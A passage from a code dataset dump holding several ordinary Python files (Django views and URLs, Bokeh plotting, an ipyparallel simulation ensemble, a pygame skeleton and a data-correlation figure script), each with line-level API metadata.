"line_number": 71, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 74, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 74, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.SpinButton", "line_number": 76, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 76, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Adjustment", "line_number": 77, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 77, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 83, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 83, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ButtonBox", "line_number": 86, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 86, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 89, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 89, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 92, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 92, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 97, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 97, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 98, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 98, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ScrolledWindow", "line_number": 101, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 101, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PolicyType", "line_number": 102, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 102, "usage_type": "name"}, {"api_name": "canvas.Canvas", "line_number": 105, "usage_type": "call"}, {"api_name": "gi.repository.GLib.timeout_add", "line_number": 114, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 114, "usage_type": "name"}, {"api_name": "gi.repository.GLib.source_remove", "line_number": 118, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 118, "usage_type": "name"}]} +{"seq_id": "119565027", "text": "# -*- coding: utf8 -*- \nfrom django.http import HttpResponse\nfrom django.template import Context,Template\nimport datetime\nimport json\n\ndef hello(request):\n\treturn HttpResponse(\"Hello world\")\n\n\ndef hours_ahead(request,offset):\n\ttry:\n\t\toffset = int(offset)\n\texcept ValueError:\n\t\traise Http404()\n\t# assert False \n\tdt = datetime.datetime.now() + datetime.timedelta(hours = offset)\n\thtml = \"In %s hour(s), it will be %s.\" % (offset, dt)\n\treturn HttpResponse(html)\n\ndef current_datetime(request):\n\tnow = datetime.datetime.now()\n\tt = Template(\" It is now{{current_date}}.\")\n\thtml = Context({'current_date':now})\n\thtml = t.render(html)\n\treturn HttpResponse(html)\n\ndef getSex(request):\n\ts = {\"data\":[{\"value\":18173,\"name\":u\"男\".encode('utf-8')},\n\t{\"value\":27518,\"name\":u\"女\".encode('utf-8')},{\"value\":11078,\"name\":u\"未知\".encode('utf-8')}]}\n\ts = json.dumps(s,ensure_ascii=False)\n\treturn HttpResponse(s,'content_type=\"application/json')\ndef gao():\n\tans = []\n\tf = open('new3.txt','r')\n\tf = f.readlines()\n\tfor i in f:\n\t\ti = i.split()\n\t\td = {}\n\t\td['value'] = i[1]\n\t\td['name'] = i[0]\n\t\tans.append(d)\n\taim = {}\n\taim['data'] = ans\n\ts = json.dumps(aim,ensure_ascii=False)\n\treturn s\ndef getProvince(requset):\n\treturn HttpResponse(gao(),'content_type=\"application/json')\n\n\ndef gao1():\n\tf = open('new2.txt','r')\n\tf = f.readlines()\n\td = {}\n\tfor i in f:\n\t\tt = i.split()\n\t\tif(len(t)!=3):\n\t\t\tcontinue;\n\t\tif t[1] != '安徽':\n\t\t\tcontinue\n\t\ttry:\n\t\t\td[t[2]] += 1;\n\t\texcept:\n\t\t\td[t[2]] = 1;\n\tans = []\n\tfor i in d:\n\t\tc = {}\n\t\tc['name'] = i;\n\t\tc['value'] = d[i]\n\t\tans.append(c)\n\taim = {}\n\taim['data'] = ans\n\treturn json.dumps(aim,ensure_ascii = False)\n\ndef getCity(request):\n\treturn HttpResponse(gao1(),'content_type=\"application/json')\n", "sub_path": "mysite/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1763, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.http.HttpResponse", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.template.Template", "line_number": 23, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "595934811", "text": "from django.conf.urls import url\nfrom .views import ArticleDetailAndCreateCommentView, ArticleCreateView, ArticleListView, ArticleUpdateView, ArticleDeleteView, OwnersArticleListView\nfrom .views import delete_comment\n\n\nurlpatterns = [\n url(r'^$', ArticleListView.as_view(), name='list'),\n url(r'^owner/(?P\\d+)/$', OwnersArticleListView.as_view(), name='owners_articles'),\n url(r'^(?P\\d+)/$', ArticleDetailAndCreateCommentView.as_view(), name='detail'),\n url(r'^new/$', ArticleCreateView.as_view(), name='create'),\n url(r'^(?P\\d+)/edit/$', ArticleUpdateView.as_view(), name='update'),\n url(r'^(?P\\d+)/delete/$', ArticleDeleteView.as_view(), name='delete'),\n url(r'^(?P\\d+)/comment_delete/$', delete_comment, name='comment_delete'),\n url(r'^select_template/$',\n 'articles.views.select_template', name='select_template'),\n]\n", "sub_path": "articles/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleListView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleListView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "views.OwnersArticleListView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.OwnersArticleListView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleDetailAndCreateCommentView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleDetailAndCreateCommentView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleCreateView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleCreateView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticleUpdateView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticleUpdateView", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "views.ArticleDeleteView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "views.ArticleDeleteView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "views.delete_comment", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "256571916", "text": "from __future__ import print_function\n\nimport numpy as np\n\nfrom bokeh.browserlib import view\nfrom bokeh.document import Document\nfrom bokeh.models.glyphs import *\nfrom bokeh.models import (\n Plot, Range1d, LinearAxis, Grid, ColumnDataSource, PanTool, WheelZoomTool\n)\nfrom bokeh.session import Session\n\ndocument = Document()\nsession = Session()\nsession.use_doc('prim_server')\nsession.load_document(document)\n\nx = np.arange(1,6)\ny = np.arange(5, 0, -1)\n\nsource = ColumnDataSource(data=dict(x=x,y=y))\n\nxdr = Range1d(start=0, end=10)\nydr = Range1d(start=0, end=10)\n\ndef make_plot(name, glyph):\n plot = Plot(x_range=xdr, y_range=ydr, min_border=80)\n\n plot.add_glyph(source, glyph)\n\n xaxis = LinearAxis()\n plot.add_layout(xaxis, 'below')\n\n yaxis = LinearAxis()\n plot.add_layout(yaxis, 'left')\n\n plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))\n plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))\n\n plot.add_tools(PanTool(), WheelZoomTool())\n\n document.add(plot)\n session.store_document(document)\n\nmake_plot('annular_wedge', AnnularWedge(x=\"x\", y=\"y\", inner_radius=0.2, outer_radius=0.5, start_angle=0.8, end_angle=3.8))\nmake_plot('annulus', Annulus(x=\"x\", y=\"y\", inner_radius=0.2, outer_radius=0.5))\nmake_plot('arc', Arc(x=\"x\", y=\"y\", radius=0.4, start_angle=0.8, end_angle=3.8))\nmake_plot('circle', Circle(x=\"x\", y=\"y\", radius=1))\nmake_plot('oval', Oval(x=\"x\", y=\"y\", width=0.5, height=0.8, angle=-0.6))\nmake_plot('ray', Ray(x=\"x\", y=\"y\", length=25, angle=0.6))\nmake_plot('rect', Rect(x=\"x\", y=\"y\", width=0.5, height=0.8, angle=-0.6))\nmake_plot('text', Text(x=\"x\", y=\"y\", text={\"value\":\"foo\"}, angle=0.6))\nmake_plot('wedge', Wedge(x=\"x\", y=\"y\", radius=0.5, start_angle=0.9, end_angle=3.2))\n\nlink = session.object_link(document.context)\nprint(\"please visit %s to see plots\" % link)\nview(link)\n", "sub_path": "examples/glyphs/prim_server.py", "file_name": "prim_server.py", "file_ext": "py", "file_size_in_byte": 1835, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "bokeh.document.Document", "line_number": 13, "usage_type": "call"}, {"api_name": "bokeh.session.Session", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 21, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 23, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 24, "usage_type": "call"}, {"api_name": "bokeh.models.Plot", "line_number": 27, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 31, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 34, "usage_type": "call"}, {"api_name": "bokeh.models.Grid", "line_number": 37, "usage_type": "call"}, {"api_name": "bokeh.models.Grid", "line_number": 38, "usage_type": "call"}, {"api_name": "bokeh.models.PanTool", "line_number": 40, "usage_type": "call"}, {"api_name": "bokeh.models.WheelZoomTool", "line_number": 40, "usage_type": "call"}, {"api_name": "bokeh.browserlib.view", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "174329141", "text": "from __future__ import print_function\n\nfrom ipyparallel import Client\nfrom EXOSIMS.Prototypes.SurveyEnsemble import SurveyEnsemble \nfrom EXOSIMS.util.get_module import get_module\nimport time\nfrom IPython.core.display import clear_output\nimport sys\nimport json\nimport os\nimport numpy as np\nimport EXOSIMS\nimport EXOSIMS.MissionSim\nimport os\nimport os.path\nimport cPickle\nimport random\nimport traceback\n\n\nclass IPClusterEnsemble(SurveyEnsemble):\n \"\"\"Parallelized suvey ensemble based on IPython parallel (ipcluster)\n \n \"\"\"\n\n def __init__(self, **specs):\n \n SurveyEnsemble.__init__(self, **specs)\n\n self.verb = specs.get('verbose', True)\n \n # access the cluster\n self.rc = Client()\n self.dview = self.rc[:]\n self.dview.block = True\n with self.dview.sync_imports(): import EXOSIMS, EXOSIMS.util.get_module, \\\n os, os.path, time, random, cPickle, traceback\n if specs.has_key('logger'):\n specs.pop('logger')\n if specs.has_key('seed'):\n specs.pop('seed')\n self.dview.push(dict(specs=specs))\n res = self.dview.execute(\"SS = EXOSIMS.util.get_module.get_module(specs['modules'] \\\n ['SurveySimulation'], 'SurveySimulation')(**specs)\")\n\n res2 = self.dview.execute(\"SS.reset_sim()\")\n\n self.vprint(\"Created SurveySimulation objects on %d engines.\"%len(self.rc.ids))\n #for row in res.stdout:\n # self.vprint(row)\n\n self.lview = self.rc.load_balanced_view()\n\n self.maxNumEngines = len(self.rc.ids)\n\n def run_ensemble(self, sim, nb_run_sim, run_one=None, genNewPlanets=True,\n rewindPlanets=True, kwargs={}):\n \"\"\"\n Args:\n sim:\n\n \"\"\"\n\n t1 = time.time()\n async_res = []\n for j in range(nb_run_sim):\n ar = self.lview.apply_async(run_one, genNewPlanets=genNewPlanets,\n rewindPlanets=rewindPlanets, **kwargs)\n async_res.append(ar)\n \n print(\"Submitted %d tasks.\"%len(async_res))\n \n runStartTime = time.time()#create job starting time\n avg_time_per_run = 0.\n tmplenoutstandingset = nb_run_sim\n tLastRunFinished = time.time()\n ar= self.rc._asyncresult_from_jobs(async_res)\n while not ar.ready():\n ar.wait(10.)\n clear_output(wait=True)\n if ar.progress > 0:\n timeleft = ar.elapsed/ar.progress * (nb_run_sim - ar.progress)\n if timeleft > 3600.:\n timeleftstr = \"%2.2f hours\"%(timeleft/3600.)\n elif timeleft > 60.:\n timeleftstr = \"%2.2f minutes\"%(timeleft/60.)\n else:\n timeleftstr = \"%2.2f seconds\"%timeleft\n else:\n timeleftstr = \"who knows\"\n\n #Terminate hanging runs\n outstandingset = self.rc.outstanding#a set of msg_ids that have been submitted but resunts have not been received\n if len(outstandingset) > 0 and len(outstandingset) < nb_run_sim:#there is at least 1 run still going and we have not just started\n avg_time_per_run = (time.time() - runStartTime)/float(nb_run_sim - len(outstandingset))#compute average amount of time per run\n if len(outstandingset) < tmplenoutstandingset:#The scheduler has finished a run\n tmplenoutstandingset = len(outstandingset)#update this. should decrease by ~1 or number of cores...\n tLastRunFinished = time.time()#update tLastRunFinished to the last time a simulation finished (right now)\n #self.vprint(\"tmplenoutstandingset %d, tLastRunFinished %0.6f\"%(tmplenoutstandingset,tLastRunFinished))\n if time.time() - tLastRunFinished > avg_time_per_run*(1 + self.maxNumEngines*2):\n self.vprint('Aborting ' + str(len(self.rc.outstanding)) + 'qty outstandingset jobs')\n self.rc.abort()#by default should abort all outstanding jobs... #it is possible that this will not stop the jobs running\n\n print(\"%4i/%i tasks finished after %4i s. About %s to go.\" % (ar.progress, nb_run_sim, ar.elapsed, timeleftstr), end=\"\")\n sys.stdout.flush()\n\n t2 = time.time()\n print(\"\\nCompleted in %d sec\" % (t2 - t1))\n \n res = [ar.get() for ar in async_res]\n \n return res\n", "sub_path": "EXOSIMS/SurveyEnsemble/IPClusterEnsemble.py", "file_name": "IPClusterEnsemble.py", "file_ext": "py", "file_size_in_byte": 4434, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "EXOSIMS.Prototypes.SurveyEnsemble.SurveyEnsemble", "line_number": 21, "usage_type": "name"}, {"api_name": "EXOSIMS.Prototypes.SurveyEnsemble.SurveyEnsemble.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "EXOSIMS.Prototypes.SurveyEnsemble.SurveyEnsemble", "line_number": 28, "usage_type": "name"}, {"api_name": "ipyparallel.Client", "line_number": 33, "usage_type": "call"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "time.time", "line_number": 76, "usage_type": "call"}, {"api_name": "IPython.core.display.clear_output", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 105, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 105, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "84137019", "text": "\n#coding:utf-8\nimport requests\nimport json\n\ndict_create_dealer={\n \"head\": {\n \"version\": \"0.01\",\n \"msgtype\": \"request\",\n \"interface\": \"get_will_d4\",\n \"remark\": \"\"\n },\n \"params\": {\n \"system\": \"HJXMBA\",\n \"dealerid\": \"200283093\"\n }\n}\n\n\n#print(dict_create_dealer)\nstrDictDealer=json.dumps(dict_create_dealer,ensure_ascii=False)\nprint('post json是{0}'.format(strDictDealer))\n#print(data)\n\nmyheaders = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, compress',\n 'Accept-Language': 'en-us;q=0.5,en;q=0.3',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}\nr=requests.post('http://10.0.10.182:8000/channel_org_interface',strDictDealer.encode('utf-8'))\nprint('返回结果:{0}'.format(r.content.decode('utf-8')))\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "other/getDealerCanRelateD.py", "file_name": "getDealerCanRelateD.py", "file_ext": "py", "file_size_in_byte": 961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "311860482", "text": "import pygame as pg\nimport numpy as np\n\n# Define Classes**************************************************************************************************************************\nclass Object:\n\n def __init__(self, image, x, y):\n self.image = pg.image.load(image)\n self.x = x\n self.y = y\n\n def move(self, x, y):\n self.x += x\n self.y += y\n\n def draw(self):\n gameDisplay.blit(self.image, (self.x, self.y))\n\nclass Spritesheet:\n def __init__(self, filename):\n try:\n self.sheet = pg.image.load(filename).convert()\n\n except pg.error as e:\n print(f\"Unable to load sprite sheet image: {filename}\")\n raise SystemExit(e)\n\n def image_at(self, rectangle, colorkey = None):\n rect = pg.Rect(rectangle)\n image = pg.Surface(rect.size).convert()\n image.blit(self.sheet, (0,0), rect)\n if colorkey == None:\n if colorkey == -1:\n color = image.get_at((0,0))\n image.set_colorkey(colorkey, pg.RLEACCEL)\n return image\n\n def images_at(self, rects, colorkey = None):\n return [self.image_at(rect,colorkey) for rect in rangerects]\n\n def load_strip(self, rect, image_count, colorkey = None):\n tups = [(rect[0]+rect[2]*x, rect[1], rect[3])\n for x in range(image_count)]\n return self.image_at(tups, colorkey)\n\nclass Tile:\n\n def __init__(self, type, image, x, y, z, width, height):\n self.type = type\n self.image = image\n self.x = x\n self.y = y\n self.z = z\n self.width = width\n self.height = height\n\nclass Terrain:\n\n def __init__(self, spritesheet, tile_width, tile_height, world_width, world_height):\n self.spritesheet = spritesheet\n self.tile_width = tile_width\n self.tile_height = tile_height\n self.world_width = world_width\n self.world_height = world_height\n self.z_offset = tile_height / 2\n\n def draw():\n for x in self.width:\n for y in self.height:\n # tile.\n return 0\n\n\ndef generate_tiles(terrain):\n for x in range(terrain.world_width):\n for y in range(terrain.world_height):\n tiles[x][y] = 0\n\n# define global variables**********************************************************************************************************\ndisplay_width = 800\ndisplay_height = 600\n\nplayer_movex = 0\nplayer_movey = 0\n\ntiles[0][0] = None\n\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\n\nend = False\n\n# create instances***********************************************************************************************************\npg.init()\ngameDisplay = pg.display.set_mode((display_width,display_height))\npg.display.set_caption('Manhunt')\nclock = pg.time.Clock()\n\n# create objects****************************************************************************************************************\nman = Object('man.png', display_width / 2, display_height / 2)\nterrain = Terrain(Spritesheet(\"tilesheet.png\"), 64, 64, 10, 10)\n\n# mainloop***********************************************************************************************************************\nwhile not end:\n\n # event handler*********************************************************************************************************\n for event in pg.event.get():\n if event.type == pg.QUIT:\n end = True\n\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_LEFT:\n player_movex = -1\n elif event.key == pg.K_RIGHT:\n player_movex = 1\n\n if event.key == pg.K_UP:\n player_movey = -1\n elif event.key == pg.K_DOWN:\n player_movey = 1\n\n if event.type == pg.KEYUP:\n if event.key == pg.K_UP or pg.K_DOWN:\n player_movey = 0\n if event.key == pg.K_LEFT or pg.K_RIGHT:\n player_movex = 0\n\n # update game*****************************************************************************************************************\n gameDisplay.fill(white)\n man.move(player_movex,player_movey)\n generate_tiles(terrain)\n man.draw()\n pg.display.update()\n clock.tick(60)\n\npg.quit()\nquit()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4265, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.error", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.RLEACCEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 108, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "279016529", "text": "import os, sys, pdb\nimport pandas as pd, numpy as np\nfrom matplotlib.colors import Normalize, rgb2hex, LogNorm\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import r2_score\n\n\ndef score_avg_mos_corr():\n data = pd.read_csv('./results/Capitals/Capitals_gru_hi_predictions.csv')\n data2 = pd.read_csv('./results/Capitals/capitals_combined_scores.csv')\n data2 = data2.rename(columns={'Unnamed: 0':'State'})\n data = data[data.Location.str.contains('45')]\n\n scores, avgs = list(), list()\n for state in np.unique(data.Location):\n try:\n scores.append(data2[data2.State==state].Score.iloc[0])\n avgs.append(np.mean(data[data.Location==state].MoLS))\n except:\n pass\n avgs = np.asarray(avgs)\n scores = np.asarray(scores)\n\n avg_norm = LogNorm(vmin=avgs.min(), vmax=avgs.max())\n score_norm = LogNorm(vmin=scores.min(), vmax=scores.max())\n\n avgs = avg_norm(avgs)\n scores=score_norm(scores)\n \n corr, _ = pearsonr(avgs, scores)\n r2 = r2_score(avgs, scores)\n print('Pearson correlation: {}'.format(corr))\n print('R^2: {}'.format(r2))\n\n\ndef samples_corr():\n capitals = pd.read_pickle('./data/capitals.pd')\n capitals = capitals[~capitals.Location.str.contains('85')]\n capitals = capitals[~capitals.Location.str.contains('California')]\n capitals = capitals[~capitals.Location.str.contains('Arizona')]\n capitals = capitals[~capitals.Location.str.contains('Texas')]\n capitals = capitals[~capitals.Location.str.contains('Wisconsin')]\n capitals = capitals[~capitals.Location.str.contains('Minnesota')]\n capitals = capitals[~capitals.Location.str.contains('North Carolina')]\n capitals = capitals[~capitals.Location.str.contains('Delaware')]\n capitals = capitals[~capitals.Location.str.contains('New Jersey')]\n capitals = capitals[capitals.Year==2016].reset_index(drop=True)\n capitals['Avg_Temp'] = capitals[['Max_Temp','Min_Temp']].mean(axis=1)\n \n train = pd.read_pickle('./data/train_data.pd')\n train = train[train.Year==2016].reset_index(drop=True)\n train['Avg_Temp'] = train[['Max_Temp','Min_Temp']].mean(axis=1)\n \n test = pd.read_pickle('./data/test_data.pd')\n test = test[test.Year==2016].reset_index(drop=True)\n test['Avg_Temp'] = test[['Max_Temp','Min_Temp']].mean(axis=1)\n \n capitals_group = capitals[['Location','Avg_Temp','Precip','MoLS']].groupby(['Location'])\n train_group = train[['Location','Avg_Temp','Precip','MoLS']].groupby(['Location'])\n test_group = test[['Location','Avg_Temp','Precip','MoLS']].groupby(['Location'])\n\n fig, axs = plt.subplots(1,3)\n names = ['Avg_Temp', 'Precip', 'MoLS']\n name_dic = {'Avg_Temp':'Average Temperature', 'Precip':'Precipitation', 'MoLS':'MoLS'}\n for i in range(0,3):\n corr_data = pd.DataFrame()\n for group in train_group:\n corr_data[group[0]] = group[1][names[i]].copy().reset_index(drop=True)\n\n for group in test_group:\n corr_data[group[0]] = group[1][names[i]].copy().reset_index(drop=True)\n\n for group in capitals_group:\n corr_data[group[0]] = group[1][names[i]].copy().reset_index(drop=True)\n\n corr_data = corr_data.astype('float').corr()\n corr_data = corr_data.iloc[0:len(train_group),len(train_group):]\n im = axs[i].imshow(corr_data,cmap='Greys_r', vmin=-0.2, vmax=1)\n axs[i].axvline(x=len(test_group)-0.5, color='tab:blue', linestyle='-', linewidth=2)\n axs[i].set_xticks(ticks=np.arange(corr_data.shape[1]))\n axs[i].set_xticklabels(labels=(['']*corr_data.shape[1]))\n axs[i].set_yticks(ticks=np.arange(corr_data.shape[0]))\n axs[i].set_yticklabels(labels=(['']*corr_data.shape[0]))\n axs[i].set_title(name_dic[names[i]])\n axs[i].set_ylabel('Training')\n axs[i].text(6,len(train_group)+6,'Testing')\n axs[i].text(len(test_group)+6,len(train_group)+6,'Capital Cities')\n plt.colorbar(im, ax=axs.ravel().tolist(), shrink=0.8, pad=0.02)\n plt.show() \n\n\nif __name__ == '__main__':\n font={'size':16}\n mpl.rc('font',**font)\n\n samples_corr()\n score_avg_mos_corr()\n \n\n", "sub_path": "figures/fig_12_input_correlations.py", "file_name": "fig_12_input_correlations.py", "file_ext": "py", "file_size_in_byte": 4198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.colors.LogNorm", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.colors.LogNorm", "line_number": 27, "usage_type": "call"}, {"api_name": "scipy.stats.pearsonr", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.rc", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "149462135", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom tensorflow.keras.models import Sequential\nfrom 